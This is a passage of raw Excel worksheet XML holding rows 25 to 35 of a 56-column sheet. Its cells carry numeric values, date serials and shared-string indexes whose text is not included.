      <c r="E25" t="s">
        <v>274</v>
      </c>
      <c r="F25" t="s">
        <v>275</v>
      </c>
      <c r="G25" s="1">
        <v>43875</v>
      </c>
      <c r="H25">
        <v>669</v>
      </c>
      <c r="I25">
        <v>669</v>
      </c>
      <c r="J25">
        <v>1</v>
      </c>
      <c r="K25">
        <v>1</v>
      </c>
      <c r="L25">
        <v>0</v>
      </c>
      <c r="M25">
        <v>0</v>
      </c>
      <c r="N25">
        <v>0</v>
      </c>
      <c r="O25">
        <v>0</v>
      </c>
      <c r="P25">
        <v>0</v>
      </c>
      <c r="Q25">
        <v>0</v>
      </c>
      <c r="R25">
        <v>0</v>
      </c>
      <c r="S25">
        <v>1</v>
      </c>
      <c r="T25">
        <v>1</v>
      </c>
      <c r="U25">
        <v>80000</v>
      </c>
      <c r="V25">
        <v>5000</v>
      </c>
      <c r="W25">
        <v>0</v>
      </c>
      <c r="X25">
        <v>0</v>
      </c>
      <c r="Y25">
        <v>0</v>
      </c>
      <c r="Z25">
        <v>0</v>
      </c>
      <c r="AA25">
        <v>0</v>
      </c>
      <c r="AB25">
        <v>0</v>
      </c>
      <c r="AC25">
        <v>0</v>
      </c>
      <c r="AD25">
        <v>700</v>
      </c>
      <c r="AE25">
        <v>80000</v>
      </c>
      <c r="AF25" t="s">
        <v>276</v>
      </c>
      <c r="AG25">
        <v>15710</v>
      </c>
      <c r="AH25">
        <v>11</v>
      </c>
      <c r="AJ25">
        <v>268</v>
      </c>
      <c r="AK25" t="s">
        <v>277</v>
      </c>
      <c r="AL25" t="s">
        <v>278</v>
      </c>
      <c r="AM25" t="s">
        <v>279</v>
      </c>
      <c r="AN25" t="s">
        <v>82</v>
      </c>
      <c r="AO25">
        <v>2015</v>
      </c>
      <c r="AP25" t="s">
        <v>280</v>
      </c>
      <c r="AQ25" t="s">
        <v>281</v>
      </c>
      <c r="AR25" t="s">
        <v>282</v>
      </c>
      <c r="AS25" t="s">
        <v>71</v>
      </c>
      <c r="AT25" t="s">
        <v>86</v>
      </c>
      <c r="AU25">
        <v>25</v>
      </c>
      <c r="AV25">
        <v>1</v>
      </c>
      <c r="AW25">
        <v>19</v>
      </c>
      <c r="AX25">
        <v>13</v>
      </c>
      <c r="AY25">
        <v>15</v>
      </c>
      <c r="AZ25">
        <v>1</v>
      </c>
      <c r="BA25" t="s">
        <v>17175</v>
      </c>
      <c r="BB25">
        <v>0</v>
      </c>
      <c r="BC25">
        <v>0</v>
      </c>
      <c r="BD25">
        <v>0</v>
      </c>
    </row>
    <row r="26" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A26">
        <v>361</v>
      </c>
      <c r="B26" t="s">
        <v>283</v>
      </c>
      <c r="C26" t="s">
        <v>99</v>
      </c>
      <c r="D26" t="s">
        <v>284</v>
      </c>
      <c r="E26" t="s">
        <v>142</v>
      </c>
      <c r="F26" t="s">
        <v>285</v>
      </c>
      <c r="G26" s="1">
        <v>43859</v>
      </c>
      <c r="H26">
        <v>687</v>
      </c>
      <c r="I26">
        <v>687</v>
      </c>
      <c r="J26">
        <v>0</v>
      </c>
      <c r="K26">
        <v>1</v>
      </c>
      <c r="L26">
        <v>0</v>
      </c>
      <c r="M26">
        <v>0</v>
      </c>
      <c r="N26">
        <v>0</v>
      </c>
      <c r="O26">
        <v>0</v>
      </c>
      <c r="P26">
        <v>0</v>
      </c>
      <c r="Q26">
        <v>0</v>
      </c>
      <c r="R26">
        <v>0</v>
      </c>
      <c r="S26">
        <v>0</v>
      </c>
      <c r="T26">
        <v>0</v>
      </c>
      <c r="U26">
        <v>0</v>
      </c>
      <c r="V26">
        <v>350000</v>
      </c>
      <c r="W26">
        <v>0</v>
      </c>
      <c r="X26">
        <v>0</v>
      </c>
      <c r="Y26">
        <v>0</v>
      </c>
      <c r="Z26">
        <v>0</v>
      </c>
      <c r="AA26">
        <v>0</v>
      </c>
      <c r="AB26">
        <v>0</v>
      </c>
      <c r="AC26">
        <v>0</v>
      </c>
      <c r="AD26">
        <v>0</v>
      </c>
      <c r="AE26">
        <v>0</v>
      </c>
      <c r="AF26" t="s">
        <v>286</v>
      </c>
      <c r="AG26">
        <v>14440</v>
      </c>
      <c r="AH26">
        <v>12</v>
      </c>
      <c r="AJ26">
        <v>160</v>
      </c>
      <c r="AK26" t="s">
        <v>114</v>
      </c>
      <c r="AL26" t="s">
        <v>114</v>
      </c>
      <c r="AM26" t="s">
        <v>287</v>
      </c>
      <c r="AN26" t="s">
        <v>288</v>
      </c>
      <c r="AO26">
        <v>2010</v>
      </c>
      <c r="AP26">
        <v>216621006</v>
      </c>
      <c r="AQ26" t="s">
        <v>289</v>
      </c>
      <c r="AR26" t="s">
        <v>290</v>
      </c>
      <c r="AU26">
        <v>27</v>
      </c>
      <c r="AV26">
        <v>0</v>
      </c>
      <c r="AW26">
        <v>0</v>
      </c>
      <c r="AX26">
        <v>0</v>
      </c>
      <c r="AY26">
        <v>2</v>
      </c>
      <c r="AZ26">
        <v>2</v>
      </c>
      <c r="BA26" t="s">
        <v>16671</v>
      </c>
      <c r="BB26" t="s">
        <v>14511</v>
      </c>
      <c r="BC26" t="s">
        <v>9550</v>
      </c>
      <c r="BD26" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="27" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A27">
        <v>67</v>
      </c>
      <c r="B27" t="s">
        <v>291</v>
      </c>
      <c r="C27" t="s">
        <v>99</v>
      </c>
      <c r="D27" t="s">
        <v>292</v>
      </c>
      <c r="E27" t="s">
        <v>142</v>
      </c>
      <c r="F27" t="s">
        <v>293</v>
      </c>
      <c r="G27" s="1">
        <v>43874</v>
      </c>
      <c r="H27">
        <v>702</v>
      </c>
      <c r="I27">
        <v>702</v>
      </c>
      <c r="J27">
        <v>7</v>
      </c>
      <c r="K27">
        <v>0</v>
      </c>
      <c r="L27">
        <v>1</v>
      </c>
      <c r="M27">
        <v>0</v>
      </c>
      <c r="N27">
        <v>0</v>
      </c>
      <c r="O27">
        <v>0</v>
      </c>
      <c r="P27">
        <v>0</v>
      </c>
      <c r="Q27">
        <v>0</v>
      </c>
      <c r="R27">
        <v>0</v>
      </c>
      <c r="S27">
        <v>0</v>
      </c>
      <c r="T27">
        <v>0</v>
      </c>
      <c r="U27">
        <v>3</v>
      </c>
      <c r="V27">
        <v>0</v>
      </c>
      <c r="W27">
        <v>500</v>
      </c>
      <c r="X27">
        <v>0</v>
      </c>
      <c r="Y27">
        <v>0</v>
      </c>
      <c r="Z27">
        <v>0</v>
      </c>
      <c r="AA27">
        <v>0</v>
      </c>
      <c r="AB27">
        <v>0</v>
      </c>
      <c r="AC27">
        <v>0</v>
      </c>
      <c r="AD27">
        <v>0</v>
      </c>
      <c r="AE27">
        <v>0</v>
      </c>
      <c r="AF27" t="s">
        <v>294</v>
      </c>
      <c r="AG27">
        <v>14440</v>
      </c>
      <c r="AH27">
        <v>12</v>
      </c>
      <c r="AJ27">
        <v>160</v>
      </c>
      <c r="AK27" t="s">
        <v>114</v>
      </c>
      <c r="AL27" t="s">
        <v>114</v>
      </c>
      <c r="AM27" t="s">
        <v>295</v>
      </c>
      <c r="AN27" t="s">
        <v>55</v>
      </c>
      <c r="AO27">
        <v>2012</v>
      </c>
      <c r="AP27">
        <v>216694880</v>
      </c>
      <c r="AQ27" t="s">
        <v>296</v>
      </c>
      <c r="AR27" t="s">
        <v>297</v>
      </c>
      <c r="AS27" t="s">
        <v>187</v>
      </c>
      <c r="AT27" t="s">
        <v>58</v>
      </c>
      <c r="AU27">
        <v>26</v>
      </c>
      <c r="AV27">
        <v>0</v>
      </c>
      <c r="AW27">
        <v>17</v>
      </c>
      <c r="AX27">
        <v>4</v>
      </c>
      <c r="AY27">
        <v>10</v>
      </c>
      <c r="AZ27">
        <v>5</v>
      </c>
      <c r="BA27" t="s">
        <v>16599</v>
      </c>
      <c r="BB27" t="s">
        <v>14265</v>
      </c>
      <c r="BC27" t="s">
        <v>9550</v>
      </c>
      <c r="BD27">
        <v>0</v>
      </c>
    </row>
    <row r="28" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A28">
        <v>114</v>
      </c>
      <c r="B28" t="s">
        <v>298</v>
      </c>
      <c r="C28" t="s">
        <v>99</v>
      </c>
      <c r="D28" t="s">
        <v>299</v>
      </c>
      <c r="E28" t="s">
        <v>300</v>
      </c>
      <c r="F28" t="s">
        <v>301</v>
      </c>
      <c r="G28" s="1">
        <v>43836</v>
      </c>
      <c r="H28">
        <v>719</v>
      </c>
      <c r="I28">
        <v>719</v>
      </c>
      <c r="J28">
        <v>1</v>
      </c>
      <c r="K28">
        <v>2</v>
      </c>
      <c r="L28">
        <v>1</v>
      </c>
      <c r="M28">
        <v>2</v>
      </c>
      <c r="N28">
        <v>0</v>
      </c>
      <c r="O28">
        <v>1</v>
      </c>
      <c r="P28">
        <v>0</v>
      </c>
      <c r="Q28">
        <v>10</v>
      </c>
      <c r="R28">
        <v>3</v>
      </c>
      <c r="S28">
        <v>0</v>
      </c>
      <c r="T28">
        <v>1</v>
      </c>
      <c r="U28">
        <v>20</v>
      </c>
      <c r="V28">
        <v>50</v>
      </c>
      <c r="W28">
        <v>10</v>
      </c>
      <c r="X28">
        <v>1500</v>
      </c>
      <c r="Y28">
        <v>0</v>
      </c>
      <c r="Z28">
        <v>70</v>
      </c>
      <c r="AA28">
        <v>0</v>
      </c>
      <c r="AB28">
        <v>500</v>
      </c>
      <c r="AC28">
        <v>10000</v>
      </c>
      <c r="AD28">
        <v>0</v>
      </c>
      <c r="AE28">
        <v>40000</v>
      </c>
      <c r="AF28" t="s">
        <v>302</v>
      </c>
      <c r="AG28">
        <v>11820</v>
      </c>
      <c r="AH28">
        <v>12</v>
      </c>
      <c r="AJ28">
        <v>159</v>
      </c>
      <c r="AK28" t="s">
        <v>303</v>
      </c>
      <c r="AL28" t="s">
        <v>304</v>
      </c>
      <c r="AM28" t="s">
        <v>305</v>
      </c>
      <c r="AN28" t="s">
        <v>288</v>
      </c>
      <c r="AO28">
        <v>2017</v>
      </c>
      <c r="AP28">
        <v>2129423707</v>
      </c>
      <c r="AQ28" t="s">
        <v>306</v>
      </c>
      <c r="AR28" t="s">
        <v>302</v>
      </c>
      <c r="AS28" t="s">
        <v>71</v>
      </c>
      <c r="AT28" t="s">
        <v>86</v>
      </c>
      <c r="AU28">
        <v>26</v>
      </c>
      <c r="AV28">
        <v>1</v>
      </c>
      <c r="AW28">
        <v>22</v>
      </c>
      <c r="AX28">
        <v>33</v>
      </c>
      <c r="AY28">
        <v>5</v>
      </c>
      <c r="AZ28">
        <v>5</v>
      </c>
      <c r="BA28" t="s">
        <v>16612</v>
      </c>
      <c r="BB28" t="s">
        <v>14309</v>
      </c>
      <c r="BC28">
        <v>0</v>
      </c>
      <c r="BD28">
        <v>0</v>
      </c>
    </row>
    <row r="29" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A29">
        <v>766</v>
      </c>
      <c r="B29" t="s">
        <v>307</v>
      </c>
      <c r="C29" t="s">
        <v>157</v>
      </c>
      <c r="D29" t="s">
        <v>308</v>
      </c>
      <c r="E29" t="s">
        <v>242</v>
      </c>
      <c r="F29" t="s">
        <v>309</v>
      </c>
      <c r="G29" s="1">
        <v>43986</v>
      </c>
      <c r="H29">
        <v>724</v>
      </c>
      <c r="I29">
        <v>724</v>
      </c>
      <c r="J29">
        <v>1</v>
      </c>
      <c r="K29">
        <v>0</v>
      </c>
      <c r="L29">
        <v>3</v>
      </c>
      <c r="M29">
        <v>0</v>
      </c>
      <c r="N29">
        <v>0</v>
      </c>
      <c r="O29">
        <v>0</v>
      </c>
      <c r="P29">
        <v>5</v>
      </c>
      <c r="Q29">
        <v>0</v>
      </c>
      <c r="R29">
        <v>15</v>
      </c>
      <c r="S29">
        <v>5</v>
      </c>
      <c r="T29">
        <v>2</v>
      </c>
      <c r="U29">
        <v>50000</v>
      </c>
      <c r="V29">
        <v>0</v>
      </c>
      <c r="W29">
        <v>2000</v>
      </c>
      <c r="X29">
        <v>0</v>
      </c>
      <c r="Y29">
        <v>0</v>
      </c>
      <c r="Z29">
        <v>0</v>
      </c>
      <c r="AA29">
        <v>2000</v>
      </c>
      <c r="AB29">
        <v>0</v>
      </c>
      <c r="AC29">
        <v>1000</v>
      </c>
      <c r="AD29">
        <v>1500</v>
      </c>
      <c r="AE29">
        <v>100000</v>
      </c>
      <c r="AF29" t="s">
        <v>310</v>
      </c>
      <c r="AG29">
        <v>68451</v>
      </c>
      <c r="AH29">
        <v>16</v>
      </c>
      <c r="AJ29">
        <v>237</v>
      </c>
      <c r="AK29" t="s">
        <v>311</v>
      </c>
      <c r="AL29" t="s">
        <v>312</v>
      </c>
      <c r="AM29" t="s">
        <v>313</v>
      </c>
      <c r="AN29" t="s">
        <v>55</v>
      </c>
      <c r="AO29">
        <v>2010</v>
      </c>
      <c r="AP29" t="s">
        <v>314</v>
      </c>
      <c r="AQ29" t="s">
        <v>315</v>
      </c>
      <c r="AR29" t="s">
        <v>316</v>
      </c>
      <c r="AS29" t="s">
        <v>71</v>
      </c>
      <c r="AT29" t="s">
        <v>58</v>
      </c>
      <c r="AU29">
        <v>25</v>
      </c>
      <c r="AV29">
        <v>0</v>
      </c>
      <c r="AW29">
        <v>50</v>
      </c>
      <c r="AX29">
        <v>204</v>
      </c>
      <c r="AY29">
        <v>13</v>
      </c>
      <c r="AZ29">
        <v>10</v>
      </c>
      <c r="BA29" t="s">
        <v>16753</v>
      </c>
      <c r="BB29" t="s">
        <v>14838</v>
      </c>
      <c r="BC29" t="s">
        <v>9974</v>
      </c>
      <c r="BD29" t="s">
        <v>9967</v>
      </c>
    </row>
    <row r="30" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A30">
        <v>590</v>
      </c>
      <c r="B30" t="s">
        <v>317</v>
      </c>
      <c r="C30" t="s">
        <v>318</v>
      </c>
      <c r="D30" t="s">
        <v>319</v>
      </c>
      <c r="E30" t="s">
        <v>111</v>
      </c>
      <c r="F30" t="s">
        <v>320</v>
      </c>
      <c r="G30" s="1">
        <v>44146</v>
      </c>
      <c r="H30">
        <v>741</v>
      </c>
      <c r="I30">
        <v>741</v>
      </c>
      <c r="J30">
        <v>1</v>
      </c>
      <c r="K30">
        <v>0</v>
      </c>
      <c r="L30">
        <v>3</v>
      </c>
      <c r="M30">
        <v>0</v>
      </c>
      <c r="N30">
        <v>0</v>
      </c>
      <c r="O30">
        <v>0</v>
      </c>
      <c r="P30">
        <v>0</v>
      </c>
      <c r="Q30">
        <v>0</v>
      </c>
      <c r="R30">
        <v>0</v>
      </c>
      <c r="S30">
        <v>0</v>
      </c>
      <c r="T30">
        <v>0</v>
      </c>
      <c r="U30">
        <v>500000</v>
      </c>
      <c r="V30">
        <v>0</v>
      </c>
      <c r="W30">
        <v>120000</v>
      </c>
      <c r="X30">
        <v>0</v>
      </c>
      <c r="Y30">
        <v>0</v>
      </c>
      <c r="Z30">
        <v>0</v>
      </c>
      <c r="AA30">
        <v>0</v>
      </c>
      <c r="AB30">
        <v>0</v>
      </c>
      <c r="AC30">
        <v>0</v>
      </c>
      <c r="AD30">
        <v>0</v>
      </c>
      <c r="AE30">
        <v>0</v>
      </c>
      <c r="AF30" t="s">
        <v>321</v>
      </c>
      <c r="AG30">
        <v>90516</v>
      </c>
      <c r="AH30">
        <v>26</v>
      </c>
      <c r="AJ30">
        <v>406</v>
      </c>
      <c r="AK30" t="s">
        <v>322</v>
      </c>
      <c r="AL30" t="s">
        <v>323</v>
      </c>
      <c r="AM30" t="s">
        <v>324</v>
      </c>
      <c r="AN30" t="s">
        <v>68</v>
      </c>
      <c r="AO30">
        <v>2009</v>
      </c>
      <c r="AP30" t="s">
        <v>325</v>
      </c>
      <c r="AQ30" t="s">
        <v>326</v>
      </c>
      <c r="AR30" t="s">
        <v>321</v>
      </c>
      <c r="AU30">
        <v>24</v>
      </c>
      <c r="AV30">
        <v>1</v>
      </c>
      <c r="AW30">
        <v>15</v>
      </c>
      <c r="AX30">
        <v>30</v>
      </c>
      <c r="AY30">
        <v>15</v>
      </c>
      <c r="AZ30">
        <v>13</v>
      </c>
      <c r="BA30" t="s">
        <v>17191</v>
      </c>
      <c r="BB30" t="s">
        <v>14700</v>
      </c>
      <c r="BC30" t="s">
        <v>9961</v>
      </c>
      <c r="BD30" t="s">
        <v>9962</v>
      </c>
    </row>
    <row r="31" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A31">
        <v>610</v>
      </c>
      <c r="B31" t="s">
        <v>327</v>
      </c>
      <c r="C31" t="s">
        <v>318</v>
      </c>
      <c r="D31" t="s">
        <v>328</v>
      </c>
      <c r="E31" t="s">
        <v>300</v>
      </c>
      <c r="F31" t="s">
        <v>329</v>
      </c>
      <c r="G31" s="1">
        <v>43923</v>
      </c>
      <c r="H31">
        <v>819</v>
      </c>
      <c r="I31">
        <v>819</v>
      </c>
      <c r="J31">
        <v>1</v>
      </c>
      <c r="K31">
        <v>0</v>
      </c>
      <c r="L31">
        <v>2</v>
      </c>
      <c r="M31">
        <v>0</v>
      </c>
      <c r="N31">
        <v>0</v>
      </c>
      <c r="O31">
        <v>0</v>
      </c>
      <c r="P31">
        <v>0</v>
      </c>
      <c r="Q31">
        <v>0</v>
      </c>
      <c r="R31">
        <v>0</v>
      </c>
      <c r="S31">
        <v>0</v>
      </c>
      <c r="T31">
        <v>0</v>
      </c>
      <c r="U31">
        <v>10000</v>
      </c>
      <c r="V31">
        <v>0</v>
      </c>
      <c r="W31">
        <v>8000</v>
      </c>
      <c r="X31">
        <v>0</v>
      </c>
      <c r="Y31">
        <v>0</v>
      </c>
      <c r="Z31">
        <v>0</v>
      </c>
      <c r="AA31">
        <v>0</v>
      </c>
      <c r="AB31">
        <v>0</v>
      </c>
      <c r="AC31">
        <v>0</v>
      </c>
      <c r="AD31">
        <v>0</v>
      </c>
      <c r="AE31">
        <v>0</v>
      </c>
      <c r="AF31" t="s">
        <v>330</v>
      </c>
      <c r="AG31">
        <v>90241</v>
      </c>
      <c r="AH31">
        <v>26</v>
      </c>
      <c r="AJ31">
        <v>420</v>
      </c>
      <c r="AK31" t="s">
        <v>331</v>
      </c>
      <c r="AL31" t="s">
        <v>332</v>
      </c>
      <c r="AM31" t="s">
        <v>333</v>
      </c>
      <c r="AN31" t="s">
        <v>82</v>
      </c>
      <c r="AO31">
        <v>2001</v>
      </c>
      <c r="AP31">
        <v>411515263</v>
      </c>
      <c r="AQ31" t="s">
        <v>334</v>
      </c>
      <c r="AR31" t="s">
        <v>330</v>
      </c>
      <c r="AU31">
        <v>25</v>
      </c>
      <c r="AV31">
        <v>0</v>
      </c>
      <c r="AW31">
        <v>73</v>
      </c>
      <c r="AX31">
        <v>163</v>
      </c>
      <c r="AY31">
        <v>50</v>
      </c>
      <c r="AZ31">
        <v>29</v>
      </c>
      <c r="BA31" t="s">
        <v>17165</v>
      </c>
      <c r="BB31" t="s">
        <v>14716</v>
      </c>
      <c r="BC31" t="s">
        <v>9970</v>
      </c>
      <c r="BD31" t="s">
        <v>9971</v>
      </c>
    </row>
    <row r="32" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A32">
        <v>175</v>
      </c>
      <c r="B32" t="s">
        <v>335</v>
      </c>
      <c r="C32" t="s">
        <v>215</v>
      </c>
      <c r="D32" t="s">
        <v>336</v>
      </c>
      <c r="E32" t="s">
        <v>111</v>
      </c>
      <c r="F32" t="s">
        <v>337</v>
      </c>
      <c r="G32" s="1">
        <v>44287</v>
      </c>
      <c r="H32">
        <v>830</v>
      </c>
      <c r="I32">
        <v>830</v>
      </c>
      <c r="J32">
        <v>2</v>
      </c>
      <c r="K32">
        <v>0</v>
      </c>
      <c r="L32">
        <v>0</v>
      </c>
      <c r="M32">
        <v>3</v>
      </c>
      <c r="N32">
        <v>0</v>
      </c>
      <c r="O32">
        <v>0</v>
      </c>
      <c r="P32">
        <v>0</v>
      </c>
      <c r="Q32">
        <v>0</v>
      </c>
      <c r="R32">
        <v>40</v>
      </c>
      <c r="S32">
        <v>0</v>
      </c>
      <c r="T32">
        <v>1</v>
      </c>
      <c r="U32">
        <v>500000</v>
      </c>
      <c r="V32">
        <v>0</v>
      </c>
      <c r="W32">
        <v>0</v>
      </c>
      <c r="X32">
        <v>1800</v>
      </c>
      <c r="Y32">
        <v>0</v>
      </c>
      <c r="Z32">
        <v>0</v>
      </c>
      <c r="AA32">
        <v>0</v>
      </c>
      <c r="AB32">
        <v>0</v>
      </c>
      <c r="AC32">
        <v>100</v>
      </c>
      <c r="AD32">
        <v>0</v>
      </c>
      <c r="AE32">
        <v>10000</v>
      </c>
      <c r="AF32" t="s">
        <v>338</v>
      </c>
      <c r="AG32">
        <v>33147</v>
      </c>
      <c r="AH32">
        <v>6</v>
      </c>
      <c r="AJ32">
        <v>147</v>
      </c>
      <c r="AK32" t="s">
        <v>339</v>
      </c>
      <c r="AL32" t="s">
        <v>340</v>
      </c>
      <c r="AM32" t="s">
        <v>341</v>
      </c>
      <c r="AN32" t="s">
        <v>55</v>
      </c>
      <c r="AO32">
        <v>1995</v>
      </c>
      <c r="AP32" t="s">
        <v>342</v>
      </c>
      <c r="AQ32" t="s">
        <v>343</v>
      </c>
      <c r="AR32" t="s">
        <v>338</v>
      </c>
      <c r="AS32" t="s">
        <v>71</v>
      </c>
      <c r="AT32" t="s">
        <v>58</v>
      </c>
      <c r="AU32">
        <v>0</v>
      </c>
      <c r="AV32">
        <v>0</v>
      </c>
      <c r="AW32">
        <v>30</v>
      </c>
      <c r="AX32">
        <v>22</v>
      </c>
      <c r="AY32">
        <v>4</v>
      </c>
      <c r="AZ32">
        <v>3</v>
      </c>
      <c r="BA32" t="s">
        <v>16627</v>
      </c>
      <c r="BB32" t="s">
        <v>14359</v>
      </c>
      <c r="BC32" t="s">
        <v>9852</v>
      </c>
      <c r="BD32" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="33" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A33">
        <v>722</v>
      </c>
      <c r="B33" t="s">
        <v>344</v>
      </c>
      <c r="C33" t="s">
        <v>60</v>
      </c>
      <c r="D33" t="s">
        <v>345</v>
      </c>
      <c r="E33" t="s">
        <v>142</v>
      </c>
      <c r="F33" t="s">
        <v>346</v>
      </c>
      <c r="G33" s="1">
        <v>44147</v>
      </c>
      <c r="H33">
        <v>883</v>
      </c>
      <c r="I33">
        <v>883</v>
      </c>
      <c r="J33">
        <v>3</v>
      </c>
      <c r="K33">
        <v>0</v>
      </c>
      <c r="L33">
        <v>0</v>
      </c>
      <c r="M33">
        <v>3</v>
      </c>
      <c r="N33">
        <v>572000</v>
      </c>
      <c r="O33">
        <v>0</v>
      </c>
      <c r="P33">
        <v>0</v>
      </c>
      <c r="Q33">
        <v>6</v>
      </c>
      <c r="R33">
        <v>0</v>
      </c>
      <c r="S33">
        <v>0</v>
      </c>
      <c r="T33">
        <v>2</v>
      </c>
      <c r="U33">
        <v>500</v>
      </c>
      <c r="V33">
        <v>0</v>
      </c>
      <c r="W33">
        <v>0</v>
      </c>
      <c r="X33">
        <v>1200</v>
      </c>
      <c r="Y33">
        <v>0</v>
      </c>
      <c r="Z33">
        <v>0</v>
      </c>
      <c r="AA33">
        <v>0</v>
      </c>
      <c r="AB33">
        <v>2100</v>
      </c>
      <c r="AC33">
        <v>0</v>
      </c>
      <c r="AD33">
        <v>0</v>
      </c>
      <c r="AE33">
        <v>60000</v>
      </c>
      <c r="AF33" t="s">
        <v>347</v>
      </c>
      <c r="AG33">
        <v>0</v>
      </c>
      <c r="AH33">
        <v>10</v>
      </c>
      <c r="AJ33">
        <v>133</v>
      </c>
      <c r="AK33" t="s">
        <v>348</v>
      </c>
      <c r="AL33" t="s">
        <v>349</v>
      </c>
      <c r="AM33" t="s">
        <v>350</v>
      </c>
      <c r="AN33" t="s">
        <v>82</v>
      </c>
      <c r="AO33">
        <v>1995</v>
      </c>
      <c r="AP33" t="s">
        <v>351</v>
      </c>
      <c r="AQ33" t="s">
        <v>352</v>
      </c>
      <c r="AR33" t="s">
        <v>353</v>
      </c>
      <c r="AU33">
        <v>25</v>
      </c>
      <c r="AV33">
        <v>1</v>
      </c>
      <c r="AW33">
        <v>52</v>
      </c>
      <c r="AX33">
        <v>220</v>
      </c>
      <c r="AY33">
        <v>22</v>
      </c>
      <c r="AZ33">
        <v>5</v>
      </c>
      <c r="BA33" t="s">
        <v>16826</v>
      </c>
      <c r="BB33" t="s">
        <v>14801</v>
      </c>
      <c r="BC33" t="s">
        <v>9485</v>
      </c>
      <c r="BD33" t="s">
        <v>10155</v>
      </c>
    </row>
    <row r="34" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A34">
        <v>592</v>
      </c>
      <c r="B34" t="s">
        <v>354</v>
      </c>
      <c r="C34" t="s">
        <v>99</v>
      </c>
      <c r="D34" t="s">
        <v>355</v>
      </c>
      <c r="E34" t="s">
        <v>142</v>
      </c>
      <c r="F34" t="s">
        <v>356</v>
      </c>
      <c r="G34" s="1">
        <v>44095</v>
      </c>
      <c r="H34">
        <v>912</v>
      </c>
      <c r="I34">
        <v>912</v>
      </c>
      <c r="J34">
        <v>1</v>
      </c>
      <c r="K34">
        <v>0</v>
      </c>
      <c r="L34">
        <v>1</v>
      </c>
      <c r="M34">
        <v>0</v>
      </c>
      <c r="N34">
        <v>0</v>
      </c>
      <c r="O34">
        <v>0</v>
      </c>
      <c r="P34">
        <v>0</v>
      </c>
      <c r="Q34">
        <v>0</v>
      </c>
      <c r="R34">
        <v>0</v>
      </c>
      <c r="S34">
        <v>0</v>
      </c>
      <c r="T34">
        <v>0</v>
      </c>
      <c r="U34">
        <v>5000</v>
      </c>
      <c r="V34">
        <v>0</v>
      </c>
      <c r="W34">
        <v>300</v>
      </c>
      <c r="X34">
        <v>0</v>
      </c>
      <c r="Y34">
        <v>0</v>
      </c>
      <c r="Z34">
        <v>0</v>
      </c>
      <c r="AA34">
        <v>0</v>
      </c>
      <c r="AB34">
        <v>0</v>
      </c>
      <c r="AC34">
        <v>0</v>
      </c>
      <c r="AD34">
        <v>0</v>
      </c>
      <c r="AE34">
        <v>0</v>
      </c>
      <c r="AF34" t="s">
        <v>357</v>
      </c>
      <c r="AG34">
        <v>14440</v>
      </c>
      <c r="AH34">
        <v>12</v>
      </c>
      <c r="AJ34">
        <v>160</v>
      </c>
      <c r="AK34" t="s">
        <v>114</v>
      </c>
      <c r="AL34" t="s">
        <v>114</v>
      </c>
      <c r="AM34" t="s">
        <v>358</v>
      </c>
      <c r="AN34" t="s">
        <v>55</v>
      </c>
      <c r="AO34">
        <v>2010</v>
      </c>
      <c r="AP34" t="s">
        <v>359</v>
      </c>
      <c r="AQ34" t="s">
        <v>360</v>
      </c>
      <c r="AR34" t="s">
        <v>357</v>
      </c>
      <c r="AS34" t="s">
        <v>71</v>
      </c>
      <c r="AT34" t="s">
        <v>58</v>
      </c>
      <c r="AU34">
        <v>26</v>
      </c>
      <c r="AV34">
        <v>0</v>
      </c>
      <c r="AW34">
        <v>20</v>
      </c>
      <c r="AX34">
        <v>2</v>
      </c>
      <c r="AY34">
        <v>2</v>
      </c>
      <c r="AZ34">
        <v>4</v>
      </c>
      <c r="BA34" t="s">
        <v>16720</v>
      </c>
      <c r="BB34" t="s">
        <v>14702</v>
      </c>
      <c r="BC34">
        <v>0</v>
      </c>
      <c r="BD34" t="s">
        <v>10035</v>
      </c>
    </row>
    <row r="35" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A35">
        <v>613</v>
      </c>
      <c r="B35" t="s">
        <v>361</v>
      </c>
      <c r="C35" t="s">
        <v>157</v>
      </c>
      <c r="D35" t="s">
        <v>362</v>
      </c>
      <c r="E35" t="s">
        <v>363</v>
      </c>
      <c r="F35" t="s">
        <v>364</v>
      </c>
      <c r="G35" s="1">
        <v>44013</v>
      </c>
      <c r="H35">
        <v>916</v>
      </c>
      <c r="I35">
        <v>916</v>
      </c>
      <c r="J35">
        <v>0</v>
      </c>
      <c r="K35">
        <v>0</v>
      </c>
      <c r="L35">
        <v>0</v>
      </c>
      <c r="M35">
        <v>0</v>
      </c>
      <c r="N35">
        <v>0</v>
      </c>
      <c r="O35">
        <v>0</v>
      </c>
      <c r="P35">
        <v>0</v>
      </c>
      <c r="Q35">
        <v>0</v>
      </c>
      <c r="R35">
        <v>0</v>
      </c>
      <c r="S35">
        <v>0</v>
      </c>
      <c r="T35">
        <v>1</v>
      </c>
      <c r="U35">
        <v>0</v>
      </c>
      <c r="V35">
        <v>0</v>
      </c>
      <c r="W35">
        <v>0</v>
      </c>
      <c r="X35">
        <v>0</v>
      </c>
      <c r="Y35">
        <v>0</v>
      </c>
      <c r="Z35">
        <v>0</v>
      </c>
      <c r="AA35">
        <v>0</v>
      </c>
      <c r="AB35">
        <v>0</v>
      </c>
      <c r="AC35">
        <v>0</v>
      </c>
      <c r="AD35">
        <v>0</v>
      </c>
      <c r="AE35">
        <v>900000</v>
      </c>
      <c r="AF35" t="s">
        <v>365</v>
      </c>
      <c r="AG35">
        <v>61174</v>
      </c>
      <c r="AH35">
        <v>16</v>
      </c>
      <c r="AJ35">
        <v>252</v>
      </c>
      <c r="AK35" t="s">
        <v>366</v>
      </c>
      <c r="AL35" t="s">
        <v>367</v>
      </c>
      <c r="AM35" t="s">
        <v>368</v>
      </c>
      <c r="AN35" t="s">
        <v>55</v>
      </c>
      <c r="AO35">
        <v>2015</v>
      </c>
      <c r="AP35" t="s">
        <v>369</v>
      </c>
      <c r="AQ35" t="s">
        <v>370</v>
      </c>
      <c r="AR35" t="s">
        <v>365</v>
      </c>
      <c r="AS35" t="s">
        <v>371</v>
      </c>
      <c r="AT35" t="s">
        <v>58</v>
